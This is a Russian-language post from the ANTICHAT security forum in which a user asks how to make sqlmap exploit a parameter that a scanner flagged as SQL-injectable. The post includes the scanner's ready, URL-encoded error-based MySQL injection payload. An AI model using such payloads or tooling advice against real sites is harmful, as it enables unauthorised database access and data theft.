HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.08.2020, 03:46
sosidzh24
Guest
Сообщений: n/a
Провел на форуме:
5258

Репутация: 0
По умолчанию

Вечер добрый.Не первый раз сталкиваюсь с ситуацией когда сканер показал sql и даже показал базу данных.Но sqlmap почему-то не хочет его брать,говорит нельзя произвести инъекцию.

Ссылка get https://www.example.com/example.php?...test&Product=1. уязвимый параметр "langid". Есть готовый пэйлоад со сканера.

-1%5c%27%2b(select+1+and+row(1%2c1)%3e(select+count (*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64) %2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2c CHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x 3a%2cfloor(rand()*2))x+from+(select+1+union+select +2)a+group+by+x+limit+1))--+1

каким образом можно его указать или подтолкнуть?Кроме --technique=

Есть кто сталкивался и решал такое?
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ